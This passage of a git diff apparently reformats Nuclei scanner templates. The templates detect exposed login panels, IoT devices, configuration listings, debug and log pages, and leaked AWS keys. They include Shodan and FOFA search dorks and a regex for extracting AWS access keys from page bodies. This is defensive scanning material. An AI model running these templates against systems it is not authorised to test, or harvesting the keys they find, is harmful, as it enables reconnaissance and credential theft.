+  name: BeyondTrust Login Panel
+  author: r3dg33k,nuk3s3c
+  severity: info
+  description: Detects default Login page for Beyond Trust PAM solution
+  metadata:
+    shodan-query: http.html:"BeyondInsight"
+  tags: beyondtrust,pam,panel
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/WebConsole/'
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>BeyondInsight</title>"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/WebConsole/'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>BeyondInsight</title>"
diff --git a/exposed-panels/epson-projector-detect.yaml b/exposed-panels/epson-projector-detect.yaml
index badaf4ea07..49c215cc30 100644
--- a/exposed-panels/epson-projector-detect.yaml
+++ b/exposed-panels/epson-projector-detect.yaml
@@ -1,27 +1,27 @@
-id: epson-projector-detect
+id: epson-projector-detect
 
-info:
-  name: Epson Projector
-  author: gy741
-  severity: info
-  metadata:
-    fofa-query: "cgi-bin/webconf.exe"
-  tags: iot,projector,panel,unauth,epson
+info:
+  name: Epson Projector
+  author: gy741
+  severity: info
+  metadata:
+    fofa-query: "cgi-bin/webconf.exe"
+  tags: iot,projector,panel,unauth,epson
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "cgi-bin/webconf.exe?page=1"
-          - "<title>Web Control</title>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "cgi-bin/webconf.exe?page=1"
+          - "<title>Web Control</title>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/extreme-netconfig-ui.yaml b/exposed-panels/extreme-netconfig-ui.yaml
index 680c3666c5..9ff70643b1 100644
--- a/exposed-panels/extreme-netconfig-ui.yaml
+++ b/exposed-panels/extreme-netconfig-ui.yaml
@@ -1,33 +1,33 @@
-id: extreme-netconfig-ui
+id: extreme-netconfig-ui
 
-info:
-  name: Extreme NetConfig UI
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'http.title:"Extreme NetConfig UI"'
-  tags: panel,tech,hiveos,extreme
+info:
+  name: Extreme NetConfig UI
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"Extreme NetConfig UI"'
+  tags: panel,tech,hiveos,extreme
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php5"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Extreme NetConfig UI</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php5"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Extreme NetConfig UI</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
diff --git a/exposed-panels/hitron-technologies.yaml b/exposed-panels/hitron-technologies.yaml
index dee433b5b9..f2a612b392 100644
--- a/exposed-panels/hitron-technologies.yaml
+++ b/exposed-panels/hitron-technologies.yaml
@@ -1,25 +1,25 @@
-id: hitron-technologies-detect
+id: hitron-technologies-detect
 
-info:
-  name: Hitron Technologies
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7062
-  tags: router,panel
+info:
+  name: Hitron Technologies
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7062
+  tags: router,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.html"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "hitron"
-          - "$.hitron.languages.lang_init();"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hitron"
+          - "$.hitron.languages.lang_init();"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/hpe-system-management-login.yaml b/exposed-panels/hpe-system-management-login.yaml
index 1041aff623..2d004eb29d 100644
--- a/exposed-panels/hpe-system-management-login.yaml
+++ b/exposed-panels/hpe-system-management-login.yaml
@@ -1,27 +1,27 @@
-id: hpe-system-management-login
+id: hpe-system-management-login
 
-info:
-  name: HPE System Management Login
-  author: divya_mudgal
-  severity: info
-  tags: hpe,tech,panel
+info:
+  name: HPE System Management Login
+  author: divya_mudgal
+  severity: info
+  tags: hpe,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/cpqlogin.htm"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: and
-        part: body
-        words:
-          - "HPE System Management Homepage"
-          - "/proxy/ssllogin"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "HPE System Management Homepage v([0-9-.]*)"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cpqlogin.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        part: body
+        words:
+          - "HPE System Management Homepage"
+          - "/proxy/ssllogin"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "HPE System Management Homepage v([0-9-.]*)"
diff --git a/exposed-panels/kenesto-login.yaml b/exposed-panels/kenesto-login.yaml
index 853eaf64ee..8151f43c6f 100644
--- a/exposed-panels/kenesto-login.yaml
+++ b/exposed-panels/kenesto-login.yaml
@@ -1,26 +1,26 @@
-id: kenesto-login
+id: kenesto-login
 
-info:
-  name: Kenesto Login Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="kenesto"'
-  tags: login,tech,kenesto
+info:
+  name: Kenesto Login Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="kenesto"'
+  tags: login,tech,kenesto
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Welcome To Kenesto&reg;</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Welcome To Kenesto&reg;</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml
index 0b2f4fc89c..727a06efff 100644
--- a/exposed-panels/lansweeper-login.yaml
+++ b/exposed-panels/lansweeper-login.yaml
@@ -1,26 +1,26 @@
-id: lansweeper-login
+id: lansweeper-login
 
-info:
-  name: Lansweeper Login
-  author: divya_mudgal
-  severity: info
-  tags: lansweeper,tech,panel
+info:
+  name: Lansweeper Login
+  author: divya_mudgal
+  severity: info
+  tags: lansweeper,tech,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.aspx"
-      - "{{BaseURL}}/favicon.ico"
-
-    stop-at-first-match: true
-    matchers-condition: or
-    matchers:
-      - type: word
-        name: login
-        words:
-          - "Lansweeper - Login"
-
-      - type: dsl
-        name: favicon
-        dsl:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.aspx"
+      - "{{BaseURL}}/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: login
+        words:
+          - "Lansweeper - Login"
+
+      - type: dsl
+        name: favicon
+        dsl:
           - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"
\ No newline at end of file
diff --git a/exposed-panels/linksys-wifi-login.yaml b/exposed-panels/linksys-wifi-login.yaml
index 082990be6f..976b80985f 100644
--- a/exposed-panels/linksys-wifi-login.yaml
+++ b/exposed-panels/linksys-wifi-login.yaml
@@ -1,28 +1,28 @@
-id: linksys-wifi-login
+id: linksys-wifi-login
 
-info:
-  name: Linksys Smart Wi-Fi
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: http.title:"Linksys Smart WI-FI"
-  tags: tech,panel,linksys,iot
+info:
+  name: Linksys Smart Wi-Fi
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: http.title:"Linksys Smart WI-FI"
+  tags: tech,panel,linksys,iot
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    redirects: true
-    max-redirects: 2
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title>Linksys Smart Wi-Fi</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Linksys Smart Wi-Fi</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/minio-console.yaml b/exposed-panels/minio-console.yaml
index 0b0e946393..b144543b9e 100644
--- a/exposed-panels/minio-console.yaml
+++ b/exposed-panels/minio-console.yaml
@@ -1,26 +1,26 @@
-id: minio-console
+id: minio-console
 
-info:
-  name: MinIO Console
-  author: pussycat0x
-  severity: info
-  tags: panel,minio
-  metadata:
-    fofa-query: app="MinIO-Console"
-    shodan-query: title:"MinIO Console"
+info:
+  name: MinIO Console
+  author: pussycat0x
+  severity: info
+  tags: panel,minio
+  metadata:
+    fofa-query: app="MinIO-Console"
+    shodan-query: title:"MinIO Console"
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login"
-
-    matchers-condition: and
-    matchers:
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(body), '<title>minio console</title>')"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(body), '<title>minio console</title>')"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposed-panels/ms-adcs-detect.yaml b/exposed-panels/ms-adcs-detect.yaml
index 194500433a..3bac89233d 100644
--- a/exposed-panels/ms-adcs-detect.yaml
+++ b/exposed-panels/ms-adcs-detect.yaml
@@ -1,29 +1,29 @@
-id: ms-adcs-detect
+id: ms-adcs-detect
 
-info:
-  name: MS Active Directory Certificate Services Detector
-  author: divya_mudgal
-  severity: info
-  tags: microsoft,ad,panel
+info:
+  name: MS Active Directory Certificate Services Detector
+  author: divya_mudgal
+  severity: info
+  tags: microsoft,ad,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 302
-          - 301
-        condition: or
-
-      - type: dsl
-        dsl:
-          - "contains(tolower(all_headers), '/certsrv')"
-
-    extractors:
-      - type: kval
-        kval:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+          - 301
+        condition: or
+
+      - type: dsl
+        dsl:
+          - "contains(tolower(all_headers), '/certsrv')"
+
+    extractors:
+      - type: kval
+        kval:
           - location
\ No newline at end of file
diff --git a/exposed-panels/netdata-dashboard-detected.yaml b/exposed-panels/netdata-dashboard-detected.yaml
index bb58d9d4b8..9ca6d2ee3f 100644
--- a/exposed-panels/netdata-dashboard-detected.yaml
+++ b/exposed-panels/netdata-dashboard-detected.yaml
@@ -1,25 +1,25 @@
-id: netdata-dashboard-detect
+id: netdata-dashboard-detect
 
-info:
-  name: NetData Dashboard Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'Server: NetData Embedded HTTP Server'
-  tags: netdata,panel,tech
+info:
+  name: NetData Dashboard Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'Server: NetData Embedded HTTP Server'
+  tags: netdata,panel,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>netdata dashboard</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>netdata dashboard</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml
index 8d4edd872c..5eeb4a5fd2 100644
--- a/exposed-panels/openemr-detect.yaml
+++ b/exposed-panels/openemr-detect.yaml
@@ -1,26 +1,26 @@
-id: openemr-detect
-
-info:
-  name: OpenEMR Product Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: app="OpenEMR"
-    shodan-query: http.html:"OpenEMR"
-  tags: panel,openemr
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/interface/login/login.php?site=default"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"title":"OpenEMR Product Registration"'
-
-      - type: status
-        status:
-          - 200
+id: openemr-detect
+
+info:
+  name: OpenEMR Product Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: app="OpenEMR"
+    shodan-query: http.html:"OpenEMR"
+  tags: panel,openemr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/interface/login/login.php?site=default"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"title":"OpenEMR Product Registration"'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/qualcomm-voip-router.yaml b/exposed-panels/qualcomm-voip-router.yaml
index c26b8d465d..6d8888d4b7 100644
--- a/exposed-panels/qualcomm-voip-router.yaml
+++ b/exposed-panels/qualcomm-voip-router.yaml
@@ -1,25 +1,25 @@
-id: qualcomm-voip-router
+id: qualcomm-voip-router
 
-info:
-  name: Qualcomm 4G LTE WiFi VoIP-Router
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
-  tags: panel,qualcomm,iot,router,voip
+info:
+  name: Qualcomm 4G LTE WiFi VoIP-Router
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
+  tags: panel,qualcomm,iot,router,voip
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>4G LTE WiFi VoIP Router</title>'
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>4G LTE WiFi VoIP Router</title>'
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposed-panels/r-webserver-login.yaml b/exposed-panels/r-webserver-login.yaml
index 993dd39a8a..e8244cb64e 100644
--- a/exposed-panels/r-webserver-login.yaml
+++ b/exposed-panels/r-webserver-login.yaml
@@ -1,23 +1,23 @@
-id: r-webserver-login
+id: r-webserver-login
 
-info:
-  name: R WebServer Login
-  author: pussycat0x
-  severity: info
-  reference: https://www.exploit-db.com/ghdb/7132
-  tags: panel,rwebserver
+info:
+  name: R WebServer Login
+  author: pussycat0x
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/7132
+  tags: panel,rwebserver
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>R WebServer</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>R WebServer</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/securepoint-utm.yaml b/exposed-panels/securepoint-utm.yaml
index de669e56e5..bca9fb0742 100644
--- a/exposed-panels/securepoint-utm.yaml
+++ b/exposed-panels/securepoint-utm.yaml
@@ -1,32 +1,32 @@
-id: securepoint-utm
+id: securepoint-utm
 
-info:
-  name: Securepoint UTM Admin Panel
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
-  tags: securepoint,panel
+info:
+  name: Securepoint UTM Admin Panel
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"'
+  tags: securepoint,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: regex
-        part: body
-        regex:
-          - '<title>Securepoint UTM v11 - (.*)</title>'
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - '<title>Securepoint UTM v11 - (.*)</title>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>'
diff --git a/exposed-panels/securityspy-detect.yaml b/exposed-panels/securityspy-detect.yaml
index 554ed506da..76a69cbbc1 100644
--- a/exposed-panels/securityspy-detect.yaml
+++ b/exposed-panels/securityspy-detect.yaml
@@ -1,25 +1,25 @@
-id: securityspy-detect
+id: securityspy-detect
 
-info:
-  name: SecuritySpy Camera Detect
-  author: pussycat0x
-  severity: medium
-  metadata:
-    shodan-dork: 'title:SecuritySpy'
-  tags: unauth,iot,securityspy,panel,camera
+info:
+  name: SecuritySpy Camera Detect
+  author: pussycat0x
+  severity: medium
+  metadata:
+    shodan-dork: 'title:SecuritySpy'
+  tags: unauth,iot,securityspy,panel,camera
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>SecuritySpy</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SecuritySpy</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/slocum-login.yaml b/exposed-panels/slocum-login.yaml
index 605b421b70..118932715d 100644
--- a/exposed-panels/slocum-login.yaml
+++ b/exposed-panels/slocum-login.yaml
@@ -1,22 +1,22 @@
-id: slocum-login
+id: slocum-login
 
-info:
-  name: Slocum Fleet Mission Control Login
-  author: pussycat0x
-  severity: info
-  tags: panel,tech,slocum
+info:
+  name: Slocum Fleet Mission Control Login
+  author: pussycat0x
+  severity: info
+  tags: panel,tech,slocum
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/sfmc/login"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>Slocum Fleet Mission Control - Login</title>"
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sfmc/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Slocum Fleet Mission Control - Login</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/tableau-panel.yaml b/exposed-panels/tableau-panel.yaml
index 148f3d6b3e..ad72efdc51 100644
--- a/exposed-panels/tableau-panel.yaml
+++ b/exposed-panels/tableau-panel.yaml
@@ -1,25 +1,25 @@
-id: tableau-panel
+id: tableau-panel
 
-info:
-  name: Tableau Python Server Default Page Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="Tableau-Python-Server"'
-  tags: tableau,panel,python
+info:
+  name: Tableau Python Server Default Page Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="Tableau-Python-Server"'
+  tags: tableau,panel,python
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Tableau Python Server</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Tableau Python Server</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/unauth-xproxy-dashboard.yaml b/exposed-panels/unauth-xproxy-dashboard.yaml
index 9041812254..2e76185f13 100644
--- a/exposed-panels/unauth-xproxy-dashboard.yaml
+++ b/exposed-panels/unauth-xproxy-dashboard.yaml
@@ -1,27 +1,27 @@
-id: unauth-xproxy-dashboard
+id: unauth-xproxy-dashboard
 
-info:
-  name: X-Proxy Dashboard Detect
-  author: pussycat0x
-  severity: high
-  metadata:
-    fofa-dork: "X-Proxy Dashboard"
-  tags: xproxy,panel
+info:
+  name: X-Proxy Dashboard Detect
+  author: pussycat0x
+  severity: high
+  metadata:
+    fofa-dork: "X-Proxy Dashboard"
+  tags: xproxy,panel
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>X-Proxy</title>'
-          - 'Dashboard</a>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>X-Proxy</title>'
+          - 'Dashboard</a>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/vrealize-loginsight-panel.yaml b/exposed-panels/vrealize-loginsight-panel.yaml
index 01ac1b1451..fc96de977d 100644
--- a/exposed-panels/vrealize-loginsight-panel.yaml
+++ b/exposed-panels/vrealize-loginsight-panel.yaml
@@ -1,26 +1,26 @@
-id: vrealize-loginsight-panel
-
-info:
-  name: vRealize Log Insight Panel
-  author: pussycat0x
-  severity: info
-  description: Detect vRealize Log Insight login panel
-  metadata:
-    verified: true
-    shodan-dork: title:"vRealize Log insight"
-  tags: panel,vmware,vrealize
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login?loginUrl=%2Findex"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - 'vRealize Log Insight'
-
-      - type: status
-        status:
-          - 200
+id: vrealize-loginsight-panel
+
+info:
+  name: vRealize Log Insight Panel
+  author: pussycat0x
+  severity: info
+  description: Detect vRealize Log Insight login panel
+  metadata:
+    verified: true
+    shodan-dork: title:"vRealize Log insight"
+  tags: panel,vmware,vrealize
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login?loginUrl=%2Findex"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'vRealize Log Insight'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/xds-amr-status.yaml b/exposed-panels/xds-amr-status.yaml
index a7f548a112..a98ce44777 100644
--- a/exposed-panels/xds-amr-status.yaml
+++ b/exposed-panels/xds-amr-status.yaml
@@ -1,31 +1,31 @@
-id: xds-amr-status
+id: xds-amr-status
 
-info:
-  name: XDS-AMR - status
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'http.title:"XDS-AMR - status"'
-  tags: panel,tech,xamr,xds
+info:
+  name: XDS-AMR - status
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"XDS-AMR - status"'
+  tags: panel,tech,xamr,xds
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.php"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>XDS-AMR - Status</title>'
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - 'XAMR\-([0-9]+)'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>XDS-AMR - Status</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'XAMR\-([0-9]+)'
diff --git a/exposures/configs/configuration-listing.yaml b/exposures/configs/configuration-listing.yaml
index f4039d46fa..4ba3d19f55 100644
--- a/exposures/configs/configuration-listing.yaml
+++ b/exposures/configs/configuration-listing.yaml
@@ -1,26 +1,26 @@
-id: configuration-listing
+id: configuration-listing
 
-info:
-  name: Sensitive Configuration Files Listing
-  author: j33n1k4
-  severity: medium
-  description: directory listing of sensitive files
-  reference: https://www.exploit-db.com/ghdb/7014
-  tags: config,listing,exposure
+info:
+  name: Sensitive Configuration Files Listing
+  author: j33n1k4
+  severity: medium
+  description: directory listing of sensitive files
+  reference: https://www.exploit-db.com/ghdb/7014
+  tags: config,listing,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/config/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of /configs"
-          - "Parent Directory"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of /configs"
+          - "Parent Directory"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposures/logs/event-debug-server-status.yaml b/exposures/logs/event-debug-server-status.yaml
index f8bfd67d9c..6a5bddbc20 100644
--- a/exposures/logs/event-debug-server-status.yaml
+++ b/exposures/logs/event-debug-server-status.yaml
@@ -1,33 +1,33 @@
-id: event-debug-server-status
-
-info:
-  name: Event Debug Server Status
-  author: pussycat0x
-  severity: low
-  metadata:
-    verified: true
-    shodan-query: title:"Event Debug Server"
-  tags: event,exposure,debug
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<h1>Event Debug Server Status</h1>'
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - 'Version: <tt>([0-9.]+)'
+id: event-debug-server-status
+
+info:
+  name: Event Debug Server Status
+  author: pussycat0x
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"Event Debug Server"
+  tags: event,exposure,debug
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<h1>Event Debug Server Status</h1>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'Version: <tt>([0-9.]+)'
diff --git a/exposures/logs/zm-system-log-detect.yaml b/exposures/logs/zm-system-log-detect.yaml
index 54c7215c7b..dfcee208e5 100644
--- a/exposures/logs/zm-system-log-detect.yaml
+++ b/exposures/logs/zm-system-log-detect.yaml
@@ -1,25 +1,25 @@
-id: zm-system-log-detect
+id: zm-system-log-detect
 
-info:
-  name: zm-system-log-detect
-  author: pussycat0x
-  severity: low
-  reference: https://www.exploit-db.com/ghdb/6926
-  tags: logs,zm,exposure
+info:
+  name: zm-system-log-detect
+  author: pussycat0x
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6926
+  tags: logs,zm,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?view=log"
-      - "{{BaseURL}}/zm/?view=log"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>ZM - System Log</title>"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?view=log"
+      - "{{BaseURL}}/zm/?view=log"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>ZM - System Log</title>"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposures/tokens/amazon/aws-access-key-value.yaml b/exposures/tokens/amazon/aws-access-key-value.yaml
index b1f6dd5190..b942b0a23a 100644
--- a/exposures/tokens/amazon/aws-access-key-value.yaml
+++ b/exposures/tokens/amazon/aws-access-key-value.yaml
@@ -1,18 +1,18 @@
-id: aws-access-key-value
+id: aws-access-key-value
 
-info:
-  name: AWS Access Key ID Value
-  author: Swissky
-  severity: info
-  tags: exposure,token,aws,amazon
+info:
+  name: AWS Access Key ID Value
+  author: Swissky
+  severity: info
+  tags: exposure,token,aws,amazon
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
diff --git a/exposures/tokens/google/google-api-key.yaml b/exposures/tokens/google/google-api-key.yaml
index 33e2265de0..1798c569c3 100644
--- a/exposures/tokens/google/google-api-key.yaml
+++ b/exposures/tokens/google/google-api-key.yaml
@@ -1,19 +1,19 @@
-id: google-api-key
